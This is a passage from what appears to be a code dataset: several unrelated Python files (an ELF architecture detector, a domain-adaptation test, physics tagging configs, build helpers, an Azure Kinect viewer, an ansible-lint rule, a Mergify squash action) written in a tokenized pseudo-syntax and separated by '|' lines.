<return>address<block_end><def_stmt>DeleteSlot self seqNo<block_start><try_stmt><block_start><del_stmt>self._memSlots[seqNo]<line_sep><return><true><block_end><except_stmt>KeyError<block_start><return><false><block_end><block_end><def_stmt>__del__ self<block_start><try_stmt><block_start><if_stmt>self._shmFlags<is><none><block_start>self._shmFile.close()<block_end><else_stmt><block_start>os.close(self._shmFile)<block_end><block_end><except_stmt><block_start>PrintGetExceptionDetails()<line_sep><raise><block_end><block_end><block_end>
|
"""
ELF architecture detection module.
"""<import_stmt>logging.config<import_from_stmt>lisa.config logging_config<line_sep>logging.config.dictConfig(logging_config)<line_sep>log=logging.getLogger()<line_sep>e_machine={2:'sparc' 3:'i386' 4:'m68k' 8:'mips' 18:'sparc32plus' 20:'ppc' 21:'ppc64' 22:'s390x' 40:'arm' 41:'alpha' 42:'sh4' 43:'sparc64' 62:'x86_64' 183:'aarch64'}<def_stmt>get_architecture file_path<block_start>"""Gets architecture and endianness information - needed
for starting guest machine and choosing proper image.
:param file_path: Path to file.
:returns: Tuple (arch, bit, endian)
"""<line_sep>arch=<none><line_sep>bit=<none><line_sep>endian=<none><with_stmt>open(file_path 'rb')<as>f<block_start>header=f.read(32)<line_sep># check ELF header 7xELF
<if_stmt>header[:4]<ne>b'\x7fELF'<block_start>log.critical('Analyzed file has invalid ELF header.')<line_sep><return>(<none> <none> <none>)<block_end># 32 vs 64 bit
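# EI_CLASS (e_ident byte 4): 1 = ELFCLASS32, 2 = ELFCLASS64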
<if_stmt>header[4]<eq>1<block_start>bit='32'<block_end><elif_stmt>header[4]<eq>2<block_start>bit='64'<block_end># endianness
<if_stmt>header[5]<eq>1<block_start>endian='little'<block_end><elif_stmt>header[5]<eq>2<block_start>endian='big'<block_end># processor architecture
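# e_machine is the 2-byte field at offset 18, right after the 16-byte e_ident and the 2-byte e_type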
byte_arch=bytearray(header[18:20])<line_sep>byte_arch_code=int.from_bytes(byte_arch endian)<if_stmt>byte_arch_code<in>e_machine<block_start>arch=e_machine[byte_arch_code]<block_end><block_end><return>(arch bit endian)<block_end>
|
<import_stmt>unittest<import_stmt>numpy<as>np<import_stmt>torch<import_from_stmt>pytorch_adapt.datasets CombinedSourceAndTargetDataset<import_from_stmt>pytorch_adapt.utils.common_functions join_lists<class_stmt>TestCombinedSourceAndTarget(unittest.TestCase)<block_start><def_stmt>test_combined self<block_start>np.random.seed(3429)<for_stmt>target_dataset_size [99 199]<block_start>src_dataset_size=117<line_sep>src=torch.arange(src_dataset_size)<line_sep>src=[{"src_imgs":i "src_labels":i}<for>i src]<line_sep>tgt=torch.arange(target_dataset_size)<line_sep>tgt=[{"target_imgs":i}<for>i tgt]<line_sep>d=CombinedSourceAndTargetDataset(src tgt)<line_sep>collected=[]<line_sep>num_loops=10000<line_sep>batch_size=64<line_sep>total_len=num_loops<times>batch_size<for_stmt>x range(num_loops)<block_start>collected.append([])<for_stmt>i range(batch_size)<block_start>batch=d[i]<line_sep>collected[x].append((batch["src_imgs"].item() batch["target_imgs"].item()))<block_end><block_end>all_src=[]<for_stmt>c collected<block_start>self.assertTrue([x[1]<for>x c]<eq>list(range(batch_size)))<line_sep>curr_src=[x[0]<for>x c]<line_sep># check for randomness
self.assertTrue(curr_src<not><in>all_src)<line_sep>all_src.append(curr_src)<block_end>all_src=join_lists(all_src)<line_sep>self.assertTrue(len(all_src)<eq>total_len)<line_sep>bincount=np.bincount(all_src)<line_sep>self.assertTrue(len(bincount)<eq>src_dataset_size)<line_sep>ideal_bincount=total_len<floordiv>src_dataset_size<line_sep>self.assertTrue(all(np.isclose(x ideal_bincount rtol=0.1)<for>x bincount))<block_end><block_end><block_end>
|
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>## IMPORTANT!
## This file was automatically generated by RecoBTag/CTagging/test/dump_training_vars_cfg.py
## with input xml files:
## - C vs L: ../data/c_vs_udsg.weight.xml sha1 checksum: 1b50773894bf3c64e41694bd48bda5f6f0e3795b
## - C vs B: ../data/c_vs_b.weight.xml sha1 checksum: c342f54c6448d488e6e2b483a3a3956e34ad8ea1
c_vs_l_vars_vpset=cms.VPSet(cms.PSet(default=cms.double(-1) name=cms.string('vertexLeptonCategory') taggingVarName=cms.string('vertexLeptonCategory')) cms.PSet(default=cms.double(-100) idx=cms.int32(0) name=cms.string('trackSip2dSig_0') taggingVarName=cms.string('trackSip2dSig')) cms.PSet(default=cms.double(-100) idx=cms.int32(1) name=cms.string('trackSip2dSig_1') taggingVarName=cms.string('trackSip2dSig')) cms.PSet(default=cms.double(-100) idx=cms.int32(0) name=cms.string('trackSip3dSig_0') taggingVarName=cms.string('trackSip3dSig')) cms.PSet(default=cms.double(-100) idx=cms.int32(1) name=cms.string('trackSip3dSig_1') taggingVarName=cms.string('trackSip3dSig')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('trackPtRel_0') taggingVarName=cms.string('trackPtRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('trackPtRel_1') taggingVarName=cms.string('trackPtRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('trackPPar_0') taggingVarName=cms.string('trackPPar')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('trackPPar_1') taggingVarName=cms.string('trackPPar')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('trackEtaRel_0') taggingVarName=cms.string('trackEtaRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('trackEtaRel_1') taggingVarName=cms.string('trackEtaRel')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackDeltaR_0') taggingVarName=cms.string('trackDeltaR')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackDeltaR_1') taggingVarName=cms.string('trackDeltaR')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackPtRatio_0') taggingVarName=cms.string('trackPtRatio')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackPtRatio_1') taggingVarName=cms.string('trackPtRatio')) cms.PSet(default=cms.double(1.1) idx=cms.int32(0) name=cms.string('trackPParRatio_0') taggingVarName=cms.string('trackPParRatio')) cms.PSet(default=cms.double(1.1) idx=cms.int32(1) name=cms.string('trackPParRatio_1') taggingVarName=cms.string('trackPParRatio')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackJetDist_0') taggingVarName=cms.string('trackJetDist')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackJetDist_1') taggingVarName=cms.string('trackJetDist')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackDecayLenVal_0') taggingVarName=cms.string('trackDecayLenVal')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackDecayLenVal_1') taggingVarName=cms.string('trackDecayLenVal')) cms.PSet(default=cms.double(0) name=cms.string('jetNSecondaryVertices') taggingVarName=cms.string('jetNSecondaryVertices')) cms.PSet(default=cms.double(-0.1) name=cms.string('jetNTracks') taggingVarName=cms.string('jetNTracks')) cms.PSet(default=cms.double(-0.1) name=cms.string('trackSumJetEtRatio') taggingVarName=cms.string('trackSumJetEtRatio')) cms.PSet(default=cms.double(-0.1) name=cms.string('trackSumJetDeltaR') taggingVarName=cms.string('trackSumJetDeltaR')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('vertexMass_0') taggingVarName=cms.string('vertexMass')) cms.PSet(default=cms.double(-10) idx=cms.int32(0) name=cms.string('vertexEnergyRatio_0') taggingVarName=cms.string('vertexEnergyRatio')) cms.PSet(default=cms.double(-999) idx=cms.int32(0) name=cms.string('trackSip2dSigAboveCharm_0') 
taggingVarName=cms.string('trackSip2dSigAboveCharm')) cms.PSet(default=cms.double(-999) idx=cms.int32(0) name=cms.string('trackSip3dSigAboveCharm_0') taggingVarName=cms.string('trackSip3dSigAboveCharm')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('flightDistance2dSig_0') taggingVarName=cms.string('flightDistance2dSig')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('flightDistance3dSig_0') taggingVarName=cms.string('flightDistance3dSig')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('vertexJetDeltaR_0') taggingVarName=cms.string('vertexJetDeltaR')) cms.PSet(default=cms.double(0) idx=cms.int32(0) name=cms.string('vertexNTracks_0') taggingVarName=cms.string('vertexNTracks')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('massVertexEnergyFraction_0') taggingVarName=cms.string('massVertexEnergyFraction')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('vertexBoostOverSqrtJetPt_0') taggingVarName=cms.string('vertexBoostOverSqrtJetPt')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonPtRel_0') taggingVarName=cms.string('leptonPtRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonPtRel_1') taggingVarName=cms.string('leptonPtRel')) cms.PSet(default=cms.double(-10000) idx=cms.int32(0) name=cms.string('leptonSip3d_0') taggingVarName=cms.string('leptonSip3d')) cms.PSet(default=cms.double(-10000) idx=cms.int32(1) name=cms.string('leptonSip3d_1') taggingVarName=cms.string('leptonSip3d')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonDeltaR_0') taggingVarName=cms.string('leptonDeltaR')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonDeltaR_1') taggingVarName=cms.string('leptonDeltaR')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonRatioRel_0') taggingVarName=cms.string('leptonRatioRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonRatioRel_1') taggingVarName=cms.string('leptonRatioRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonEtaRel_0') taggingVarName=cms.string('leptonEtaRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonEtaRel_1') taggingVarName=cms.string('leptonEtaRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonRatio_0') taggingVarName=cms.string('leptonRatio')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonRatio_1') taggingVarName=cms.string('leptonRatio')))<line_sep>c_vs_b_vars_vpset=cms.VPSet(cms.PSet(default=cms.double(-1) name=cms.string('vertexLeptonCategory') taggingVarName=cms.string('vertexLeptonCategory')) cms.PSet(default=cms.double(-100) idx=cms.int32(0) name=cms.string('trackSip2dSig_0') taggingVarName=cms.string('trackSip2dSig')) cms.PSet(default=cms.double(-100) idx=cms.int32(1) name=cms.string('trackSip2dSig_1') taggingVarName=cms.string('trackSip2dSig')) cms.PSet(default=cms.double(-100) idx=cms.int32(0) name=cms.string('trackSip3dSig_0') taggingVarName=cms.string('trackSip3dSig')) cms.PSet(default=cms.double(-100) idx=cms.int32(1) name=cms.string('trackSip3dSig_1') taggingVarName=cms.string('trackSip3dSig')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('trackPtRel_0') taggingVarName=cms.string('trackPtRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('trackPtRel_1') taggingVarName=cms.string('trackPtRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) 
name=cms.string('trackPPar_0') taggingVarName=cms.string('trackPPar')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('trackPPar_1') taggingVarName=cms.string('trackPPar')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('trackEtaRel_0') taggingVarName=cms.string('trackEtaRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('trackEtaRel_1') taggingVarName=cms.string('trackEtaRel')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackDeltaR_0') taggingVarName=cms.string('trackDeltaR')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackDeltaR_1') taggingVarName=cms.string('trackDeltaR')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackPtRatio_0') taggingVarName=cms.string('trackPtRatio')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackPtRatio_1') taggingVarName=cms.string('trackPtRatio')) cms.PSet(default=cms.double(1.1) idx=cms.int32(0) name=cms.string('trackPParRatio_0') taggingVarName=cms.string('trackPParRatio')) cms.PSet(default=cms.double(1.1) idx=cms.int32(1) name=cms.string('trackPParRatio_1') taggingVarName=cms.string('trackPParRatio')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackJetDist_0') taggingVarName=cms.string('trackJetDist')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackJetDist_1') taggingVarName=cms.string('trackJetDist')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackDecayLenVal_0') taggingVarName=cms.string('trackDecayLenVal')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackDecayLenVal_1') taggingVarName=cms.string('trackDecayLenVal')) cms.PSet(default=cms.double(0) name=cms.string('jetNSecondaryVertices') taggingVarName=cms.string('jetNSecondaryVertices')) cms.PSet(default=cms.double(-0.1) name=cms.string('jetNTracks') taggingVarName=cms.string('jetNTracks')) cms.PSet(default=cms.double(-0.1) name=cms.string('trackSumJetEtRatio') taggingVarName=cms.string('trackSumJetEtRatio')) cms.PSet(default=cms.double(-0.1) name=cms.string('trackSumJetDeltaR') taggingVarName=cms.string('trackSumJetDeltaR')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('vertexMass_0') taggingVarName=cms.string('vertexMass')) cms.PSet(default=cms.double(-10) idx=cms.int32(0) name=cms.string('vertexEnergyRatio_0') taggingVarName=cms.string('vertexEnergyRatio')) cms.PSet(default=cms.double(-999) idx=cms.int32(0) name=cms.string('trackSip2dSigAboveCharm_0') taggingVarName=cms.string('trackSip2dSigAboveCharm')) cms.PSet(default=cms.double(-999) idx=cms.int32(0) name=cms.string('trackSip3dSigAboveCharm_0') taggingVarName=cms.string('trackSip3dSigAboveCharm')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('flightDistance2dSig_0') taggingVarName=cms.string('flightDistance2dSig')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('flightDistance3dSig_0') taggingVarName=cms.string('flightDistance3dSig')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('vertexJetDeltaR_0') taggingVarName=cms.string('vertexJetDeltaR')) cms.PSet(default=cms.double(0) idx=cms.int32(0) name=cms.string('vertexNTracks_0') taggingVarName=cms.string('vertexNTracks')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('massVertexEnergyFraction_0') taggingVarName=cms.string('massVertexEnergyFraction')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) 
name=cms.string('vertexBoostOverSqrtJetPt_0') taggingVarName=cms.string('vertexBoostOverSqrtJetPt')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonPtRel_0') taggingVarName=cms.string('leptonPtRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonPtRel_1') taggingVarName=cms.string('leptonPtRel')) cms.PSet(default=cms.double(-10000) idx=cms.int32(0) name=cms.string('leptonSip3d_0') taggingVarName=cms.string('leptonSip3d')) cms.PSet(default=cms.double(-10000) idx=cms.int32(1) name=cms.string('leptonSip3d_1') taggingVarName=cms.string('leptonSip3d')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonDeltaR_0') taggingVarName=cms.string('leptonDeltaR')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonDeltaR_1') taggingVarName=cms.string('leptonDeltaR')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonRatioRel_0') taggingVarName=cms.string('leptonRatioRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonRatioRel_1') taggingVarName=cms.string('leptonRatioRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonEtaRel_0') taggingVarName=cms.string('leptonEtaRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonEtaRel_1') taggingVarName=cms.string('leptonEtaRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonRatio_0') taggingVarName=cms.string('leptonRatio')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonRatio_1') taggingVarName=cms.string('leptonRatio')))<line_sep>
|
# coding: utf-8
"""Miscellaneous helpers."""<import_stmt>inspect<import_stmt>subprocess<import_stmt>sys<import_from_stmt>pathlib Path<import_from_stmt>typing Any Callable Iterator List Optional<import_from_stmt>docker.types Mount# type: ignore
<import_from_stmt>buildchain config<import_from_stmt>buildchain constants<import_from_stmt>buildchain types<def_stmt>export_only_tasks module_name:str<arrow>List[str]<block_start>"""Return the list of tasks defined in the specified module.
Arguments:
module_name: name of the module
Returns:
The name of all the task-creator defined in this module.
"""<line_sep><return>[name<for>name,_ inspect.getmembers(sys.modules[module_name] inspect.isfunction)<if>name.startswith("task_")]<block_end><def_stmt>build_relpath path:Path<arrow>Path<block_start>"""Return the given path, but relative to the build root.
Arguments:
path: an absolute path inside the build directory
Returns:
The same path, but relative to the build directory.
Examples:
>>> build_relpath(Path('/home/foo/metalk8s/_build/metalk8s.iso'))
PosixPath('_build/metalk8s.iso')
"""<line_sep><return>path.relative_to(config.BUILD_ROOT.parent)<block_end><def_stmt>title_with_target1 command:str<arrow>Callable[[types.Task] str]<block_start>"""Return a title with the command suffixed with the first target.
Arguments:
command: name of the command
task: a doit task
Returns:
A function that returns the title
"""<def_stmt>title task:types.Task<arrow>str<block_start><return>"{cmd: <{width}} {path}".format(cmd=command width=constants.CMD_WIDTH path=build_relpath(Path(task.targets[0])) )<block_end><return>title<block_end><def_stmt>title_with_subtask_name command:str<arrow>Callable[[types.Task] str]<block_start>"""Return a title with the command suffixed with the sub-task name.
Arguments:
command: name of the command
task: a doit task
Returns:
A function that returns the title
"""<def_stmt>title task:types.Task<arrow>str# Extract the sub-task name (the part after `:`) from the task name.
<block_start><return>"{cmd: <{width}} {name}".format(cmd=command width=constants.CMD_WIDTH name=task.name.split(":")[1])<block_end><return>title<block_end><def_stmt>bind_mount source:Path target:Path **kwargs:Any<arrow>Mount<block_start>"""Return a Docker mount object.
Arguments:
source: the host path to be mounted
target: the container path the source should be mounted to
Keyword arguments:
Passed through to the underlying docker.services.Mount object
initialization
"""<line_sep><return>Mount(source=str(source) target=str(target) type="bind" **kwargs)<block_end><def_stmt>bind_ro_mount source:Path target:Path<arrow>Mount<block_start>"""Return *read-only* Docker mount object.
Arguments:
source: the host path to be mounted
target: the container path the source should be mounted to
"""<line_sep><return>bind_mount(source=source target=target read_only=<true>)<block_end><def_stmt>git_ls directory:Optional[str]=<none><arrow>Iterator[Path]<block_start>"""Return the list of files tracked by Git under `root` (recursively).
Arguments:
directory: directory to list (relative to the root of the repo).
Returns:
A list of files tracked by Git.
"""<line_sep>root=constants.ROOT<if>directory<is><none><else>constants.ROOT/directory<assert_stmt>root.is_dir()<line_sep><return>map(Path subprocess.check_output(["git" "ls-files" "-z" root] encoding="utf-8").split("\x00")[:-1] )<block_end># `:-1` to skip the last element (empty string).
<def_stmt>unlink_if_exist filepath:Path<arrow><none><block_start>"""Delete a file if it exists."""<try_stmt><block_start>filepath.unlink()<block_end><except_stmt>FileNotFoundError<block_start><pass><block_end><block_end>
|
'''
simple_viewer.py
A simple viewer to demonstrate the image capture capabilities of an Azure
Kinect device using the Python API. This is not the fastest way to display
a sequence of images; this is only meant to show how to capture frames
in a sequence.
Requirements:
Users should install the following python packages before using this module:
matplotlib
Copyright (c) Microsoft Corporation. All rights reserved.
Licensed under the MIT License.
Kinect For Azure SDK.
'''<line_sep># This package is used for displaying the images.
# It is not part of the k4a package and is not a hard requirement for k4a.
# Users need to install these packages in order to use this module.
<import_stmt>matplotlib.pyplot<as>plt<line_sep># This will import all the public symbols into the k4a namespace.
<import_stmt>k4a<def_stmt>simple_viewer # Open a device using the static function Device.open().
<block_start>device=k4a.Device.open()<line_sep># In order to start capturing frames, need to start the cameras.
# The start_cameras() function requires a device configuration which
# specifies the modes in which to put the color and depth cameras.
# For convenience, the k4a package pre-defines some configurations
# for common usage of the Azure Kinect device, but the user can
# modify the values to set the device in their preferred modes.
device_config=k4a.DEVICE_CONFIG_BGRA32_2160P_WFOV_2X2BINNED_FPS15<line_sep>device.start_cameras(device_config)<line_sep># Get a capture.
# The -1 tells the device to wait forever until a capture is available.
capture=device.get_capture(-1)<line_sep># Open a matplotlib figure to display images.
fig=plt.figure()<line_sep>ax=[]<line_sep>ax.append(fig.add_subplot(1 3 1 label="Color"))<line_sep>ax.append(fig.add_subplot(1 3 2 label="Depth"))<line_sep>ax.append(fig.add_subplot(1 3 3 label="IR"))<line_sep># The capture has the following fields that can be read right away:
# color : the color image
# depth : the depth image
# ir : the ir image
im=[]<line_sep>im.append(ax[0].imshow(capture.color.data))<line_sep>im.append(ax[1].imshow(capture.depth.data cmap='jet'))<line_sep>im.append(ax[2].imshow(capture.ir.data cmap='gray'))<line_sep>ax[0].title.set_text('Color')<line_sep>ax[1].title.set_text('Depth')<line_sep>ax[2].title.set_text('IR')<line_sep># Note: The data in the images is in BGRA planes, but the matplotlib
# library expects them to be in RGBA. This results in an inverted color
# display if not properly handled. The user can splice the planes as
# appropriate or use opencv which has a function call to transform
# BGRA into RGBA.
<while_stmt>fig<is><not><none># Draw the figure with the images.
<block_start>plt.pause(.1)<line_sep>plt.draw()<line_sep># Get a new capture.
capture=device.get_capture(-1)<if_stmt>capture<is><none><block_start><del_stmt>fig<line_sep><break><block_end># Update the images in the figures.
im[0].set_data(capture.color.data)<line_sep>im[1].set_data(capture.depth.data)<line_sep>im[2].set_data(capture.ir.data)<line_sep># There is no need to delete the capture since Python will take care of
# that in the object's deleter.
<block_end># There is no need to stop the cameras since the deleter will stop
# the cameras, but it's still prudent to do it explicitly.
device.stop_cameras()<line_sep># There is no need to delete resources since Python will take care
# of releasing resources in the objects' deleters.
<block_end><if_stmt>__name__<eq>'__main__'<block_start>simple_viewer()<block_end>
|
"""All tasks should be have name come first."""<import_stmt>sys<import_from_stmt>typing Any Dict Optional Union<import_from_stmt>ansiblelint.file_utils Lintable<import_from_stmt>ansiblelint.rules AnsibleLintRule<import_from_stmt>ansiblelint.testing RunFromText<class_stmt>KeyOrderRule(AnsibleLintRule)<block_start>"""Ensure specific order of keys in mappings."""<line_sep>id="key-order"<line_sep>shortdesc=__doc__<line_sep>severity="LOW"<line_sep>tags=["formatting" "experimental"]<line_sep>version_added="v6.2.0"<line_sep>needs_raw_task=<true><def_stmt>matchtask self task:Dict[str Any] file:Optional[Lintable]=<none><arrow>Union[bool str]<block_start>raw_task=task["__raw_task__"]<if_stmt>"name"<in>raw_task<block_start>attribute_list=[*raw_task]<if_stmt>bool(attribute_list[0]<ne>"name")<block_start><return>"'name' key is not first"<block_end><block_end><return><false><block_end><block_end># testing code to be loaded only with pytest or when executed the rule file
<if_stmt>"pytest"<in>sys.modules<block_start><import_stmt>pytest<line_sep>PLAY_FAIL="""---
- hosts: localhost
tasks:
- no_log: true
shell: echo hello
name: task with no_log on top
- when: true
name: task with when on top
shell: echo hello
- delegate_to: localhost
name: delegate_to on top
shell: echo hello
- loop:
- 1
- 2
name: loopy
command: echo {{ item }}
- become: true
name: become first
shell: echo hello
- register: test
shell: echo hello
name: register first
"""<line_sep>PLAY_SUCCESS="""---
- hosts: localhost
tasks:
- name: test
command: echo "test"
- name: test2
debug:
msg: "Debug without a name"
- name: Flush handlers
meta: flush_handlers
- no_log: true # noqa key-order
shell: echo hello
name: task with no_log on top
"""<line_sep>@pytest.mark.parametrize("rule_runner" (KeyOrderRule ) indirect=["rule_runner"])<def_stmt>test_task_name_has_name_first_rule_pass rule_runner:RunFromText<arrow><none><block_start>"""Test rule matches."""<line_sep>results=rule_runner.run_playbook(PLAY_SUCCESS)<assert_stmt>len(results)<eq>0<block_end>@pytest.mark.parametrize("rule_runner" (KeyOrderRule ) indirect=["rule_runner"])<def_stmt>test_task_name_has_name_first_rule_fail rule_runner:RunFromText<arrow><none><block_start>"""Test rule matches."""<line_sep>results=rule_runner.run_playbook(PLAY_FAIL)<assert_stmt>len(results)<eq>6<block_end><block_end>
|
<import_stmt>pywasm<line_sep># pywasm.on_debug()
runtime=pywasm.load('./examples/fib.wasm')<line_sep>r=runtime.exec('fib' [10])<line_sep>print(r)<line_sep>
|
"""
Install any components that fall under 'galaxy' directive in main.yaml
"""<import_from_stmt>cloudbio.galaxy _setup_users<import_from_stmt>cloudbio.galaxy _setup_galaxy_env_defaults<import_from_stmt>cloudbio.galaxy _install_galaxy<import_from_stmt>cloudbio.galaxy _configure_galaxy_options<def_stmt>install_galaxy_webapp env<block_start>_prep_galaxy(env)<line_sep>_install_galaxy(env)<line_sep>_configure_galaxy_options(env)<block_end><def_stmt>_prep_galaxy env<block_start>_setup_users(env)<line_sep>_setup_galaxy_env_defaults(env)<block_end>
|
# -*- encoding: utf-8 -*-
#
# Copyright © 2021 Mergify SAS
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
<import_stmt>typing<import_stmt>voluptuous<import_from_stmt>mergify_engine actions<import_from_stmt>mergify_engine check_api<import_from_stmt>mergify_engine context<import_from_stmt>mergify_engine rules<import_from_stmt>mergify_engine signals<import_from_stmt>mergify_engine squash_pull<import_from_stmt>mergify_engine.actions utils<as>action_utils<import_from_stmt>mergify_engine.dashboard subscription<import_from_stmt>mergify_engine.rules types<class_stmt>SquashAction(actions.Action)<block_start>flags=(actions.ActionFlag.ALLOW_AS_ACTION|actions.ActionFlag.ALLOW_AS_COMMAND|actions.ActionFlag.ALWAYS_RUN|actions.ActionFlag.ALLOW_ON_CONFIGURATION_CHANGED|actions.ActionFlag.DISALLOW_RERUN_ON_OTHER_RULES)<line_sep>validator={voluptuous.Required("bot_account" default=<none>):voluptuous.Any(<none> types.Jinja2) voluptuous.Required("commit_message" default="all-commits"):voluptuous.Any("all-commits" "first-commit" "title+body") }<line_sep>@staticmethod<def_stmt>command_to_config string:str<arrow>typing.Dict[str typing.Any]<block_start><if_stmt>string<block_start><return>{"commit_message":string.strip()}<block_end><else_stmt><block_start><return>{}<block_end><block_end><async_keyword><def_stmt>run self ctxt:context.Context rule:rules.EvaluatedRule<arrow>check_api.Result<block_start><try_stmt><block_start>bot_account=<await>action_utils.render_bot_account(ctxt self.config["bot_account"] required_feature=subscription.Features.BOT_ACCOUNT missing_feature_message="Squash with `bot_account` set are disabled" required_permissions=[] )<block_end><except_stmt>action_utils.RenderBotAccountFailure<as>e<block_start><return>check_api.Result(e.status e.title e.reason)<block_end><if_stmt>ctxt.pull["commits"]<le>1<block_start><return>check_api.Result(check_api.Conclusion.SUCCESS "Pull request is already one-commit long" "" )<block_end><try_stmt><block_start>commit_title_and_message=<await>ctxt.pull_request.get_commit_message()<block_end><except_stmt>context.RenderTemplateFailure<as>rmf<block_start><return>check_api.Result(check_api.Conclusion.ACTION_REQUIRED "Invalid commit message" str(rmf) )<block_end><if_stmt>commit_title_and_message<is><not><none><block_start>title,message=commit_title_and_message<line_sep>message=f"{title}\n\n{message}"<block_end><elif_stmt>self.config["commit_message"]<eq>"all-commits"<block_start>message=f"{(<await>ctxt.pull_request.title)} (#{(<await>ctxt.pull_request.number)})\n"<line_sep>message<augadd>"\n\n* ".join([commit["commit_message"]<for>commit <await>ctxt.commits])<block_end><elif_stmt>self.config["commit_message"]<eq>"first-commit"<block_start>message=(<await>ctxt.commits)[0]["commit_message"]<block_end><elif_stmt>self.config["commit_message"]<eq>"title+body"<block_start>message=f"{(<await>ctxt.pull_request.title)} (#{(<await>ctxt.pull_request.number)})"<line_sep>message<augadd>f"\n\n{<await>ctxt.pull_request.body}"<block_end><else_stmt><block_start><raise>RuntimeError("Unsupported commit_message option")<block_end><try_stmt><block_start><await>squash_pull.squash(ctxt message bot_account )<block_end><except_stmt>squash_pull.SquashFailure<as>e<block_start><return>check_api.Result(check_api.Conclusion.FAILURE "Pull request squash failed" e.reason)<block_end><else_stmt><block_start><await>signals.send(ctxt "action.squash")<block_end><return>check_api.Result(check_api.Conclusion.SUCCESS "Pull request squashed successfully" "")<block_end><async_keyword><def_stmt>cancel self ctxt:context.Context rule:"rules.EvaluatedRule"<arrow>check_api.Result# pragma: no cover
<block_start><return>actions.CANCELLED_CHECK_REPORT<block_end><block_end>
|
"""Simple class containing the tree structure for the canvas items."""<import_from_stmt>typing Dict Generic Iterable List Optional Sequence TypeVar Union<line_sep>T=TypeVar("T")<class_stmt>Tree(Generic[T])<block_start>"""A Tree structure. Nodes are stores in a depth-first order.
``None`` is the root node.
@invariant: len(self._children) == len(self._nodes) + 1
"""<def_stmt>__init__ self<arrow><none># List of nodes in the tree, sorted in the order they ought to be
# rendered
<block_start>self._nodes:List[T]=[]<line_sep># Per entry a list of children is maintained.
